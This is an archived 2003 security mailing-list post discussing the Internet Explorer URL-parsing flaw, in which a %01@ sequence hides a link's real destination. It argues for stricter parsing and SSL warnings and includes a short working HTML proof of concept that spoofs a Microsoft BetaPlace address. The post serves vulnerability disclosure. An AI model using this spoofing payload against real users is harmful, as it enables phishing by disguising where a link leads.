lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: emvs.fd.3FB4D11C at cpo.tn.tudelft.nl (Erik van Straten)
Subject: Re: Internet Explorer URL parsing vulnerability

Hi all,

On Wed, 10 Dec 2003 13:01:42 -0500 Valdis Kletnieks wrote:
> Most reasonable software will put in an outline-box or "\NNN", or
> other similar indication a glyph is not displayable in the charset
> in use, and then *continue trying* to render the rest of the
> string.

I disagree that software should attempt to continue parsing URL's
(and *ML code for that matter) after an error or if something
unexpected happens. This is asking for lots of new vulns. Instead,
everything should come to a halt and a "page" or errorbox should
say "Bad URL syntax".

An IE warningbox for "legitimate" use of @ in URL's would be great.

In case of SSL, the lock icon should *immediately* disappear, and
an (optional) warningbox should popup, if the hostname in the cert
no longer matches *either* the one displayed in the URL combobox
*or* the actual underlaying connection. Also, probably it is a good
idea to have the page turn blank (or have a red cross) as soon as
the displayed URL doesn't match the connection (for example if
someone starts to manually edit the URL, but eventually does not
press enter).

Now for the fun part.

Some people have rightfully expressed their concerns whether
https://www.betaplace.com actually is a Microsoft site (it is).

To confirm, visit https://www.betaplace.microsoft.com ; it works,
however currently the certificate is invalid (hostname mismatch).

Here's my tip for Microsoft (acks to Petard :)
Save to file whatever.htm, and open that in MSIE:

-------------- start cut here -------------
<HTML><BODY>
<a href="https://www.betaplace.microsoft.com"
onclick="location.href=unescape(

'https://www.betaplace.microsoft.com%01@....betaplace.com/betaplace/sign-in/betaplace.asp'

); return false;">
Visit the *REAL* Microsoft's BetaPlace site</a>
</BODY></HTML>
-------------- end cut here -------------

Note: if the line with '' in the middle wraps, unwrap it before
saving to the htm file. There shouldn't be any spaces in it. The
blank lines in between are okay.

Cheers,
Erik

On Thu, 11 Dec 2003 19:20:14 +0000 Petard wrote:
> It gets better... it works with SSL sites as well. The little lock, and
> no warning message:
> http://petard.freeshell.org/hotmail-pr.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ